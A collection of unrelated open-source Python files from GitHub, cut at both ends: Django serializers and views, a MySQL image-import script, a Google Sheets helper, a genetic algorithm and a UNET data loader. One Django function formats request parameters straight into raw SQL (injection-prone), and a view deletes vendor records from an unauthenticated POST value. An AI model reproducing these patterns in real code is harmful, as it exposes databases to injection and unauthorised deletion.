serialize(dataType, djgMdl.objects.all())\n \n return data\n\n\ndef serialize_by_getParam(request, dtype, table):\n \"\"\"\n Parse any type of data from the Django Database to a Json Object\n \"\"\"\n \n from django.core.serializers import serialize\n \n from glass.pys import __import\n from glass.webg.djg.mdl.i import get_fieldsTypes\n \n def __getWhrTemplate(t):\n return '{}=\\'{}\\'' if t == str else '{}={}'\n \n appAndModel = table.split('_')\n django_model = __import('{}.models.{}'.format(\n appAndModel[0], '_'.join(appAndModel[1:])\n ))\n \n dataTag = 'geojson' if dtype == 'gjson' or dtype == 'geojson' \\\n else 'json'\n \n # Get Columns name and type\n colsTypes = get_fieldsTypes(django_model)\n colsName = set(colsTypes.keys())\n colsGET = set([str(x) for x in request.GET.keys()])\n colsQuery = list(colsName.intersection(colsGET))\n \n if any(colsQuery):\n # Do a query\n dicQuery = {}\n fldCount = 0\n \n for fld in request.GET.keys():\n if fld != 'logic':\n dicQuery[fld] = request.GET[fld].split('_')\n fldCount += 1\n \n if fldCount and fldCount == 1:\n field = list(dicQuery.keys())[0]\n fld_type = colsTypes[field]\n \n fld_value_template = __getWhrTemplate(fld_type)\n \n whr = ' OR '.join([\n fld_value_template.format(field, v) for v in dicQuery[field]\n ])\n \n elif fldCount and fldCount > 1:\n logic = 'OR' if 'logic' not in request.GET else \\\n request.GET['logic']\n \n for field in dicQuery:\n fld_type = colsTypes[field]\n \n fld_value_template = __getWhrTemplate(fld_type)\n \n docQuery[field] = ' OR '.join([\n fld_value_template.format(\n field, x) for x in dicQuery[field]\n ])\n \n __logic = ' {} '.format(logic)\n whr = __logic.join([\n '({})'.format(dicQuery[k]) for k in dicQuery.keys()\n ])\n \n __data = serialize(dataTag, django_model.objects.raw(\n 'SELECT * FROM {} WHERE {}'.format(table, whr)\n ))\n \n else:\n __data = serialize(dataTag, django_model.objects.all())\n \n return __data\n\n\ndef serialize_by_query(model, query, dataType):\n \"\"\"\n Return data extracted from the Django Database using Raw SQL\n Query\n \"\"\"\n \n from django.core.serializers import serialize\n from glass import __import\n \n appAndModel = model.split('_')\n djgModel = __import('{}.models.{}'.format(\n appAndModel[0], '_'.join(appAndModel[1:])\n ))\n \n dataType = 'geojson' if dataType == 'gjson' or dataType=='geojson' \\\n else 'json'\n \n data = serialize(dataType, djgModel.objects.raw(query))\n \n return data\n\n\ndef mdl_serialize_to_json(model, dataType, filePath, filterQ=None):\n \"\"\"\n Serialize data from Django Database and store it in one file\n \"\"\"\n \n from django.core.serializers import get_serializer\n from glass import __import\n \n # Get Model object\n app_model = model.split('_')\n modelObj = __import('{}.models.{}'.format(\n app_model[0], '_'.join(app_model[1:])\n ))\n \n # Get Serializer for json\n JSON_Serializer = get_serializer(dataType)\n json_serializer = JSON_Serializer()\n \n # Write file with data\n with open(filePath, \"w\") as out:\n json_serializer.serialize(\n modelObj.objects.all() if not filterQ else modelObj.objects.filter(\n **filterQ\n ),\n stream=out\n )\n\n","repo_name":"jasp382/glass","sub_path":"glass/wg/djg/mdl/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"16969814697","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.conf.urls import url, patterns, include\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.http import HttpResponse\nfrom .views import BookDetailView\n\ndef render_robots(request):\n permission = 'noindex' in settings.ROBOTS_META_TAGS and 'Disallow' or 'Allow'\n return HttpResponse('User-Agent: *\\n%s: /\\n' % permission, content_type='text/plain')\n\n \ni18n_urls = (\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin/salmonella/', include('salmonella.urls'))\n)\n\n\nurlpatterns = patterns('',\n url(r'^robots\\.txt$', render_robots),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^edw/', include('edw.urls')),\n url(r'^book/(?P[0-9A-Za-z_.-]+)/$', BookDetailView.as_view(), name=\"book_detail\"),\n )\n\n\nif settings.USE_I18N:\n urlpatterns += i18n_patterns('', *i18n_urls)\nelse:\n urlpatterns += i18n_urls\n\nif settings.DEBUG:\n urlpatterns = patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n url(r'', include('django.contrib.staticfiles.urls')),\n) + urlpatterns\n","repo_name":"infolabs/django-edw","sub_path":"backend/sandbox/sample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"72056946665","text":"import mysql_connector as con\nfrom time import perf_counter\nfrom datetime import datetime\nimport time\nimport os\nimport meta as m\nimport argparse\n\n# TODO: run automations of this script, returning and logging the\n# total time of the inserts and tweaking the buffer size argument\n# based on consistent increases in time.\n# Also: figure out why iterations with same buffersize are wildly different\n# in terms of runtime.\n\ndes = \"\"\"ECO DB Import Tool\"\"\"\n\nparser = argparse.ArgumentParser(description=des,\n formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument('-i',\n '--in_dir',\n type=str,\n help='image input directory')\nparser.add_argument('-q',\n '--q_dir',\n type=str,\n help='image quarantine directory')\nparser.add_argument('-d',\n '--d_dir',\n type=str,\n help='image delete directory')\nparser.add_argument('-c',\n '--cpus',\n type=int,\n help='number of processors')\nparser.add_argument('-b',\n '--buffer_size',\n type=int,\n help='buffer size')\nparser.add_argument('-p',\n '--port',\n type=int,\n help='DB port number')\nargs = parser.parse_args()\n\nif args.in_dir is not None and os.path.exists(args.in_dir):\n in_dir = args.in_dir\nelse:\n raise IOError\nif args.q_dir is not None and os.path.exists(args.q_dir):\n q_dir = args.q_dir\nelse:\n raise IOError\nif args.d_dir is not None and os.path.exists(args.d_dir):\n d_dir = args.d_dir\nelse:\n raise IOError\nif args.cpus is not None:\n cpus = args.cpus\nelse:\n cpus = os.cpu_count()\nif args.buffer_size is not None:\n buffer_size = args.buffer_size\nelse:\n buffer_size = 1\nif args.port is not None:\n port = args.port\nelse:\n port = 3306\n\n\n# Strips the returned meta of 'category' labels in the keys.\ndef cleaned_meta(meta):\n values = []\n for d in meta:\n for s in d:\n vals = {}\n for v in d[s]:\n tag = v.split(' ')\n if len(tag) > 1:\n tag = tag[1]\n else:\n tag = tag[0]\n vals[tag] = d[s][v]\n values.append(vals)\n return values\n\n\n# Cleans out files and moves them to a given directory, deleting empty dir.\ndef clean_dir(out, files):\n for f in files:\n folder = os.path.basename(os.path.dirname(f))\n out_folder = os.path.join(out, folder)\n file = os.path.join(out_folder, os.path.basename(f))\n if not os.path.exists(out_folder):\n os.mkdir(out_folder)\n os.rename(f, file)\n cur_folder = os.path.split(f)[0]\n if(cur_folder != in_dir):\n try:\n os.rmdir(cur_folder)\n except OSError:\n pass\n\n\nif __name__ == '__main__':\n __spec__ = None\n # read cfg for host and database to connect to\n with open(\"db.cfg\") as f:\n host = f.readline().strip('\\n')\n database = f.readline().strip('\\n')\n\n # read cfg for credentials (username and password to DB)\n # TODO: decrypt using a key found in another file(?)\n with open(\"cred.cfg\") as f:\n usr = f.readline().strip('\\n')\n pwd = f.readline().strip('\\n')\n\n # variable to be injected\n inj = []\n # failure injectable\n fail = []\n # the columsn matching the DB specification\n # and format (to be inserted into)\n columns = (\"CameraNumber,Orientation,\"\n \"XResolution,YResolution,\"\n \"ResolutionUnit,Software,TimeTaken,\"\n \"ExposureTime,FNumber,ExposureProgram,\"\n \"ISOSpeedRatings,ExifVersion,\"\n \"ComponentsConfiguration,\"\n \"CompressedBitsPerPixel,\"\n \"ShutterSpeedValue,ApertureValue,\"\n \"ExposureBiasValue,\"\n \"MaxApertureValue,MeteringMode,Flash,\"\n \"Checksum,Data\")\n # exif tags that are returned (in this order)\n tags = (\"ImageDescription,Orientation,\"\n \"XResolution,YResolution,\"\n \"ResolutionUnit,Software,DateTime,\"\n \"ExposureTime,FNumber,ExposureProgram,\"\n \"ISOSpeedRatings,ExifVersion,\"\n \"ComponentsConfiguration,\"\n \"CompressedBitsPerPixel,\"\n \"ShutterSpeedValue,ApertureValue,\"\n \"ExposureBiasValue,\"\n \"MaxApertureValue,MeteringMode,Flash,\"\n \"Checksum,Data\")\n # statement for image table insertion\n statement = (f\"insert into image ({columns}) values \")\n # build upon this to use for image insert ... (%s, %s,...),\n query = ''\n # statement and query for inserting into log table\n log = (\"insert into importrun (Start, End, Attempted) values (%s, %s, %s);\")\n # statement for inserting into failure table\n failure = (\"insert into failure (Start, Checksum, Note) values \")\n # build upon this to use for failure insert ... (%s, %s,...)\n fail_query = ''\n\n # tags that should be taken from exif\n # (exactly as they are found from exifread)\n tag_set = (\"Image ImageDescription, Image Orientation, \"\n \"Image XResolution, Image YResolution, \"\n \"Image ResolutionUnit, Image Software, \"\n \"Image DateTime, EXIF ExposureTime, EXIF FNumber, \"\n \"EXIF ExposureProgram, EXIF ISOSpeedRatings, \"\n \"EXIF ExifVersion, EXIF ComponentsConfiguration, \"\n \"EXIF CompressedBitsPerPixel, \"\n \"EXIF ShutterSpeedValue, \"\n \"EXIF ApertureValue, EXIF ExposureBiasValue, \"\n \"EXIF MaxApertureValue, \"\n \"EXIF MeteringMode, EXIF Flash\")\n\n # from the single-value dict, get the total and metatags pair\n # then clean the data\n (total, meta), = m.get_meta(in_dir, tag_set, q_dir, cpus).items()\n values = cleaned_meta(meta)\n\n # list of the exif tags\n cols = tags.split(',')\n # current buffer size\n i = 0\n # count the number of times the buffer is dumped erroneously\n buffer_dumps = 0\n # the types to be converted and fitted to the right formats\n timestamps = [\"DateTime\"]\n ints = [\"ImageDescription\", \"XResolution\", \"YResolution\"]\n floats = [\"ExposureTime\",\n \"FNumber\",\n \"CompressedBitsPerPixel\",\n \"ShutterSpeedValue\",\n \"MaxApertureValue\"]\n # files that may be moved to out dir or quarantine dir\n # depends on if they are successful in insert\n files_pending = []\n # files to be moved to d_dir\n deletes = []\n # files to be moved to quarantine\n quarantines = []\n # performance timing\n start = perf_counter()\n # epoch timing for log\n l_start = time.time()\n # connect and query\n with con.MYSQL(host, database, port, usr, pwd) as db:\n # for every row of exif\n for row in values:\n # row of exif data, this is what will be inserted\n # made of converted values\n fRow = []\n try:\n # for every exif tag that is in the returned meta dict\n for c in cols:\n # do conversions\n if row.get(c) is None or row[c].strip(' ') == '':\n row[c] = None\n elif c in timestamps:\n d = datetime.strptime(row[c], \"%Y:%m:%d %H:%M:%S\")\n ts = int(time.mktime(d.timetuple()))\n row[c] = ts\n elif c in ints:\n row[c] = int(row[c])\n elif c in floats:\n if '/' in row[c]:\n nums = row[c].split('/')\n row[c] = float(nums[0])/float(nums[1])\n else:\n row[c] = float(row[c])\n fRow.append(row[c])\n # on value conversion failure, put in quarantine and log failure\n except Exception as e:\n quarantines.append(row[\"Path\"])\n fail.extend([l_start, row[\"Checksum\"], str(e)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n continue\n # buffer is added to if this point reached\n i = i + 1\n # add current file to pending\n files_pending.append(row[\"Path\"])\n row = fRow\n # new image to insert, append to query\n query += '(' + '%s,'*(len(cols)-1) + '%s),'\n # new image to insert, append to value injectable\n inj.extend(row)\n # when buffer is full, attempt insert\n if i >= buffer_size:\n # attempt query\n query = statement + query[:-1] + ';'\n r = db.query(query, inj)\n # on success, add file to be moved to deleted folder\n # reset pending files\n if not db.errors:\n deletes.extend(files_pending)\n files_pending = []\n # on failure\n else:\n # reset general query errors\n db.errors = ''\n # buffer dumped, increment\n buffer_dumps += 1\n # break up the injectables list into lists corresponding to files\n # each sublist length matches the number of columns\n data = [inj[x:x+len(cols)] for x in range(0, len(inj), len(cols))]\n # single-insert query\n query = statement + '(' + '%s,'*(len(cols)-1) + '%s);'\n # perform single-inserts using sublists\n # insert failures and unmasked error codes\n for d, j in zip(data, files_pending):\n inj = d\n r = db.query(query, inj)\n if db.errors:\n quarantines.append(j)\n fail.extend([l_start, d[20], str(db.errors)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n db.errors = ''\n # buffer is reset\n i = 0\n # injectables is reset\n inj = []\n # query is reset\n query = ''\n # reached end of files, buffer not empty, attempt to insert\n # same process as above\n if i != 0:\n query = statement + query[:-1] + \";\"\n r = db.query(query, inj)\n if not db.errors:\n deletes.extend(files_pending)\n files_pending = []\n else:\n db.errors = ''\n buffer_dumps += 1\n data = [inj[x:x+len(cols)] for x in range(0, len(inj), len(cols))]\n query = statement + '(' + '%s,'*(len(cols)-1) + '%s);'\n for d, j in zip(data, files_pending):\n inj = d\n r = db.query(query, inj)\n if db.errors:\n quarantines.append(j)\n fail.extend([l_start, d[20], str(db.errors)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n db.errors = ''\n query = ''\n # done inserting images, record performance end\n stop = perf_counter()\n # if images have actually been processed, insert into failure, performance\n if total > 0:\n l_stop = time.time()\n db.query(log, [l_start, l_stop, total])\n if fail:\n fail_query = failure + fail_query[:-1] + \";\"\n r = db.query(fail_query, fail)\n\n r = db.query(\"insert into performance (Start, Time, Buffer, Attempted, BufferDumps) values (%s, %s, %s, %s, %s);\", [l_start, round(stop-start, 6), buffer_size, total, buffer_dumps])\n #clean_dir(d_dir, deletes)\n #clean_dir(q_dir, quarantines)\n","repo_name":"jsksjs/flow_insert","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":12083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"43784905011","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse,JsonResponse\nfrom administrator.models import Category, SubCategory, VendorPost, Brand, FeaturedProducts, ClassifiedAds\nfrom account.models import Vendor\nfrom django.db.models import Q\n\n\n\ndef index(request):\n\tcategory = Category.objects.all()\n\tvendor = Vendor.objects.all()\n\tcontext={'category':category, 'vendor':vendor}\n\treturn render(request, 'index.html', context)\n\ndef allcategories(request):\n\tcategory = Category.objects.all()\n\tsubcategory = SubCategory.objects.all()\n\tcontext = {'category':category, 'subcategory':subcategory}\n\treturn render(request, 'allcategories.html', context)\n\ndef category(request, id):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tvendor_name = Vendor.objects.all()\n\tmaincategory = Category.objects.get(id=id)\n\tfilter_category = Category.objects.get(id=id)\n\tqs = VendorPost.objects.filter(category=filter_category)\n\tdetails = VendorPost.objects.filter(category=maincategory)\n\tcontext = {'category':category, 'subcategory':subcategory, 'qs':qs, 'details':details}\n\treturn render(request, 'category.html', context )\n\ndef details(request, id):\n\tpost_pk = request.POST.get(\"post_pk\")\n\tpost = Vendor.objects.get(id_user=post_pk)\n\tpost.delete()\n\t# print(post.user)\n\treturn JsonResponse({\"msg\":\"deleted\"})\n\n\n\ndef featuredProducts(request):\n\tcategory = Category.objects.all()\n\tsubcategory = SubCategory.objects.all()\n\tbrand = Brand.objects.all()\n\tfeatured = FeaturedProducts.objects.all()\n\treturn render(request, 'featuredproducts.html', {'category':category, 'subcategory':subcategory, 'brand':brand, 'featured':featured})\n\ndef todays_deal(request):\n\treturn render(request, 'todays_deal.html')\n\ndef bundledProducts(request):\n\treturn render(request, 'bundledProducts.html')\n\ndef classified_ads(request):\n\tclassified_ads = ClassifiedAds.objects.all()\n\treturn render(request, 'classified_ads.html')\n\ndef allbrands(request):\n\tcategory = Category.objects.all()\n\tbrand = Brand.objects.all()\n\tcontext={'category':category, 'brand':brand}\n\treturn render(request, 'allbrands.html', context)\n\ndef allvendors(request):\n\treturn render(request, 'allvendors.html')\n\ndef all_vendors_location(request):\n\treturn render(request, 'all_vendors_location.html')\n\ndef blog(request):\n\treturn render(request, 'blog.html')\n\ndef contact_us(request):\n\treturn render(request, 'contact_us.html')\n\n\ndef filter_items(request):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tsearch = request.POST.get('search')\n\tcategory1 = request.POST.get('category')\n\tservice = request.POST.get('service')\n\tif service == 'Vendor':\n\t\tsearchcategory = Vendor\n\t\tqueryset = Vendor.objects.filter( Q(company_name=search) or Q(business_name=search))\n\tif category1 == 'All Categories':\n\t\tqueryset = VendorPost.objects.filter( Q(Product_title=search))\n\n\n\tif service == \"Products/Services\":\n\t\tsearchcategory = VendorPost\n\t\tqueryset = VendorPost.objects.filter( Q(Product_title=search) or Q(category=category1))\n\t\n\tcontext = {'category':category, 'subcategory':subcategory, 'queryset':queryset } \n\treturn render(request, 'filter_search.html', context)\n\t\ndef other_filtered_items(request):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tminprice = request.POST.get('minprice')\n\tmaxprice = request.POST.get('maxprice')\n\tsearch = request.POST.get('search')\n\tcategory1 = request.POST.get('category')\n\tsubcategory1 = request.POST.get('subcategory')\n\tif category1 == 'ALL CATEGORIES':\n\t\tqueryset = VendorPost.objects.filter( Q(Product_title=search))\n\telse:\t\t\n\t\tcategory_qs = Category.objects.get(name=category1)\t\n\t\tbrand1 = request.POST.get('brand')\t\n\t\tbrand_qs = Brand.objects.get(name=brand1)\n\t\tsubcategory_qs = SubCategory.objects.get(subcategory=subcategory1)\n\t\tqueryset = VendorPost.objects.filter( Q(Product_title=search) and Q(category=category_qs) and Q(subcategory=subcategory_qs) and Q(brand=brand_qs))\n\tcontext = {'queryset':queryset, 'minprice':minprice, 'maxprice':maxprice, 'subcategory':subcategory, 'category':category}\n\treturn render(request, 'other_filtered_products.html', context)\n\n","repo_name":"budescode/ecommerce2","sub_path":"project/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21695593248","text":"import os.path\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\n\nclass Sheets:\n def __init__(self, range):\n self.spreadsheetid = '178VffXNLhO9ft3XdHLS8c-SHzprySG5LNl8dCWP-ozw'\n self.range = range\n self.scopes = ['https://www.googleapis.com/auth/spreadsheets']\n self.creds = None\n if os.path.exists('sheets/token.json'):\n self.creds = Credentials.from_authorized_user_file('sheets/token.json', self.scopes)\n if not self.creds or not self.creds.valid:\n if self.creds and self.creds.expired and self.creds.refresh_token:\n self.creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'client_secret_304336328785-4ebvdd4uue0tevpttvbgjiln6mrfeqb1.apps.googleusercontent.com.json',\n self.scopes)\n self.creds = flow.run_local_server(port=0)\n with open('sheets/token.json', 'w') as token:\n token.write(self.creds.to_json())\n\n def Append(self, array):\n try:\n value_input_option = 'RAW'\n values = array\n body = {\n 'values': values\n }\n service = build('sheets', 'v4', credentials=self.creds)\n result = service.spreadsheets().values().update(\n spreadsheetId=self.spreadsheetid, range=self.range,\n valueInputOption=value_input_option, body=body).execute()\n\n except HttpError as err:\n print(err)\n\n def Get(self):\n try:\n service = build('sheets', 'v4', credentials=self.creds)\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=self.spreadsheetid,\n range=self.range).execute()\n return result.get('values', [])\n except HttpError as err:\n print(err)\n\n def Color(self, row, color):\n service = build('sheets', 'v4', credentials=self.creds)\n rng_id = {'Лаунчпады Обновляемые': 438461124, 'Голосовалки Обновляемые': 1475704027, 'NFT Обновляемые': 478055467}\n sheet_id = rng_id[self.range]\n row1 = row - 1\n row2 = row\n body = {\n \"requests\": [\n {\n \"updateCells\": {\n \"range\": {\n \"sheetId\": sheet_id,\n \"startRowIndex\": 5,\n \"endRowIndex\": 6,\n \"startColumnIndex\": row1,\n \"endColumnIndex\": row2\n },\n \"rows\": [\n {\n \"values\": [\n {\n \"userEnteredFormat\": {\n \"backgroundColor\": {\n color: 1\n }\n }\n }\n ]\n }\n ],\n \"fields\": \"userEnteredFormat.backgroundColor\"\n }\n }\n ]\n }\n res = service.spreadsheets().batchUpdate(spreadsheetId=self.spreadsheetid, body=body).execute()\n","repo_name":"bucin98/Email_sender","sub_path":"sheets/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27585843271","text":"#******************************************\n\"\"\"\nInstituto Politecnico Nacional\nEscuela superior de fisica y Matematicas\nlicenciatura de Matematica algoritmica\nFundamentos de inteligencia Artificial\nEditor: Ortiz Ortiz Bosco\ntitulo: Algoritmo Genetico; Maximo de una \nfuncion\n\"\"\"\n#------------------------------------------\n# Modulos a importar\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as mt\n#------------------------------------------\n# funcion de muchos maximos\ndef f_x(x):\n return -(0.1+(1-x)**2-0.1*mt.cos(6*mt.pi*(1-x)))+2\n#------------------------------------------\n# Lista decimal\ndef listToDecimal(num):\n decimal:np.float64=0\n for i in range(len(num)):\n decimal+=num[i]*10**(-i)\n return decimal\n#------------------------------------------\n# Mutaciones\ndef mutar(individuos,prob,pool):\n for j in range(len(individuos)):\n mutar_individuo=individuos[j]\n if np.random.random() 0:\n\targ = list(map(int, input().split()))\n\tn, k = arg[0], arg[1]\n\tset_s = set(list(map(int, input().split())))\n\tprint(list(universe - set_s)[k])\n\ttestcases -= 1","repo_name":"karanm97/codingProblems","sub_path":"mex.py","file_name":"mex.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40610223496","text":"#1\r\nMODEL_NAME = \"unet\"\r\nIMG_MIN_SIZE=128\r\nIMG_CHANNELS=3\r\n\r\nSTEPS_IN_TRAINING = 1\r\nSTEPS_IN_EVALUATION = 1\r\n\r\nUSE_WEIGHTS_N_EROSION = False\r\n\r\nfrom pathlib import Path\r\n# TRAIN_PATH = Path('D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\training')\r\nTRAIN_PATH = Path('D:\\\\UNET\\\\DataGene\\\\nf_datatraining')\r\nTEST_PATH = Path('D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\testing')\r\n\r\n#2\r\nimport os\r\nimport sys\r\nimport random\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom skimage import io, transform, morphology, filters\r\nfrom scipy import ndimage\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nwarnings.filterwarnings('ignore', category=UserWarning, module='skimage')\r\n\r\n#3\r\nfrom collections import namedtuple\r\nimport hashlib\r\n#Instead of relying on random seeds to keep validation set separate from training\r\n#Using SHA1 to convert a file name to a random number between 1 and 100.\r\ndef filename_to_uniform_number(filepath, MAX_ITEMS_PER_CLASS=2 ** 27 - 1 ):\r\n hash_name = filepath.name.split('_nohash_')[0]\r\n hash_name_hashed = hashlib.sha1(hash_name.encode(\"utf-8\")).hexdigest()\r\n return ((int(hash_name_hashed, 16) % (MAX_ITEMS_PER_CLASS + 1)) *\r\n (1 / MAX_ITEMS_PER_CLASS))\r\n\r\ndef which_set(fn, validation_size=0.1666):\r\n if filename_to_uniform_number(fn) < validation_size:\r\n return tf.estimator.ModeKeys.EVAL\r\n return tf.estimator.ModeKeys.TRAIN\r\n\r\n#4\r\nTE = namedtuple('TE', [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL])\r\n\r\npaths = TE([],[])\r\n\r\n#Set validation set percentage\r\nfor x in TRAIN_PATH.glob(\"*\"):\r\n getattr(paths, which_set(x, 0.1666)).append(x)\r\n\r\nprint(\"Validation set percentage:\", len(paths.eval)/(len(paths.train)+len(paths.eval)))\r\n\r\n#5\r\n#Slice function\r\n# slice(a) -> get the items from position 0 to position a-1\r\n# slice(a,b) -> get the items from position a to position b-1\r\n# slice(a,b,c) -> get the items from positon a to position b-1 with the differences btw 2 consecutive items is c\r\n\r\nIMG = (slice(None), slice(None), slice(0,3))\r\nMASK = (slice(None), slice(None), slice(3,4))\r\nWEIGHTS = (slice(None), slice(None), slice(4,5))\r\n\r\n#6\r\ndef show_sample(sample):\r\n if type (sample) == tf.Tensor:\r\n print(\"Unable to display tensor that was not executed, run_in_sess(sample)\", sample)\r\n return\r\n images = [sample[IMG], sample[MASK], sample[WEIGHTS]]\r\n show_image_list(images)\r\n\r\ndef show_image_list(images):\r\n if len(images) == 1:\r\n im = plt.imshow(np.squeeze(images[0]))\r\n else:\r\n fig, axs = plt.subplots(1, len(images), figsize=(20,20))\r\n for img, ax in zip(images, axs):\r\n im = ax.imshow(np.squeeze(img))\r\n fig.colorbar(im, ax=axs.ravel().tolist(), shrink=0.2)\r\n plt.show()\r\n\r\n#7\r\ndef calculate_unet_background_weight(merged_mask, masks, w0=10, q=5,):\r\n weight = np.zeros(merged_mask.shape)\r\n # calculate weight for important pixels\r\n distances = np.array([ndimage.distance_transform_edt(m==0) for m in masks])\r\n shortest_dist = np.sort(distances, axis=0)\r\n # distance to the border of the nearest cell\r\n d1 = shortest_dist[0]\r\n # distance to the border of the second nearest cell\r\n d2 = shortest_dist[1] if len(shortest_dist) > 1 else np.zeros(d1.shape)\r\n\r\n weight = w0 * np.exp(-(d1+d2)**2/(2*q**2)).astype(np.float32)\r\n weight = 1 + (merged_mask == 0) * weight\r\n return weight\r\n\r\ndef binary_erosion_tf(mask):\r\n def binary_erosion(img):\r\n img = ndimage.morphology.binary_erosion((img > 0 ), border_value=1).astype(np.uint8)\r\n return img\r\n return tf.py_func(binary_erosion, [mask], tf.uint8)\r\n\r\ndef calculate_weights_tf(merged_mask, masks):\r\n return tf.py_func(calculate_unet_background_weight, [merged_mask, masks], tf.float32)\r\n\r\n#8\r\n#Load sample\r\ndef load_mask_tf(sample_path, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n mask_ds = (tf.data.Dataset.list_files(sample_path+\"/masks*/*.png\")\r\n .map(lambda x: tf.image.decode_image(tf.read_file(x), channels=1), num_parallel_calls=4))\r\n\r\n if use_weights_n_erosion:\r\n mask_ds = mask_ds.map(binary_erosion_tf)\r\n\r\n masks = tf.contrib.data.get_single_element(mask_ds.batch(1024))\r\n masks = tf.clip_by_value(tf.cast(masks, dtype=tf.float32), 0, 1) # convert to binary mask (it was 0, 255)\r\n colors = tf.cast(tf.range(1, tf.shape(masks)[0]+1), dtype=tf.float32)\r\n colors = tf.reshape(colors, shape=[-1,1,1,1])\r\n merged_mask = tf.reduce_max(masks * colors, axis=0)\r\n\r\n if use_weights_n_erosion:\r\n weights = calculate_weights_tf(merged_mask, masks)\r\n else:\r\n weights = tf.ones_like(merged_mask)\r\n\r\n return merged_mask, weights\r\n\r\ndef load_sample_tf(sample_path, load_mask=True, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n image = tf.contrib.data.get_single_element(tf.data.Dataset.list_files(sample_path+\"/images/*.png\")\r\n .map(lambda x: tf.image.decode_image(tf.read_file(x), channels=3)))\r\n image = tf.cast(image, dtype=tf.float32)\r\n if load_mask:\r\n merged_mask, weights = load_mask_tf(sample_path, use_weights_n_erosion=use_weights_n_erosion)\r\n sample = tf.concat([image, merged_mask, weights], axis=2)\r\n else:\r\n img_shape = tf.shape(image)\r\n mask_shape = [img_shape[0],img_shape[1],1]\r\n sample = tf.concat([image, tf.zeros(mask_shape), tf.ones(mask_shape)], axis=2)\r\n\r\n return sample\r\n\r\ndef run_in_sess(fn, *args, **kwargs):\r\n with tf.Graph().as_default():\r\n x = fn(*args, **kwargs)\r\n init = (tf.global_variables_initializer(), tf.local_variables_initializer())\r\n with tf.Session() as sess:\r\n sess.run(init)\r\n ret = sess.run(x)\r\n return ret\r\n\r\ndef load_sample(sample_path, load_mask=True, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n return run_in_sess(load_sample_tf, str(sample_path), load_mask, use_weights_n_erosion)\r\n\r\nsample = load_sample(paths.train[350], use_weights_n_erosion=True)\r\nprint(\"A slow version of load_sample that calculate weights and erosion, normally the weigts are set to an array of ones\")\r\nprint(\"Sample size:\", sample.shape)\r\n# show_sample(sample)\r\nassert sample.dtype == 'float32'\r\nassert sample.shape[2] == 5, sample.shape[2]\r\nprint(\"Maximum weight set\", np.max(sample[WEIGHTS]))\r\n\r\n#9\r\n#Reduce size of Original Image to fit the data scale for training\r\ndef pad_to_min_size_tf(img, batch=False):\r\n \"\"\"Pads image so that it's height and width is divisable by IMG_MIN_SIZE\r\n\r\n It handles both single images or batches of images.\r\n \"\"\"\r\n if batch:\r\n print (\"Batch mode\")\r\n img_shape=slice(1,3)\r\n samples_dim = [[0,0]]\r\n else:\r\n img_shape=slice(0,2)\r\n samples_dim = []\r\n\r\n shape = tf.shape(img)\r\n desired_shape = tf.cast(tf.ceil(tf.cast(shape[img_shape], dtype=tf.float32) / IMG_MIN_SIZE) * IMG_MIN_SIZE, dtype=tf.int32)\r\n pad = (desired_shape - shape[img_shape])\r\n padding = samples_dim+[[0, pad[0]], [0, pad[1]], [0, 0]]\r\n return tf.pad(img, padding, mode='SYMMETRIC', name='test'), shape\r\n\r\n# sample2, orig_shape = run_in_sess(pad_to_min_size_tf, np.expand_dims(sample,0), batch=False)\r\nsample2, orig_shape = run_in_sess(pad_to_min_size_tf, sample, batch=False)\r\nprint(\"Orignal shape:\", sample.shape, \"new padded shape:\", sample2.shape)\r\n# show_sample(sample2)\r\n\r\ndef random_crop_tf(sample):\r\n return tf.random_crop(sample, size=[IMG_MIN_SIZE, IMG_MIN_SIZE, tf.shape(sample)[2]])\r\n\r\nsample2 = run_in_sess(random_crop_tf, 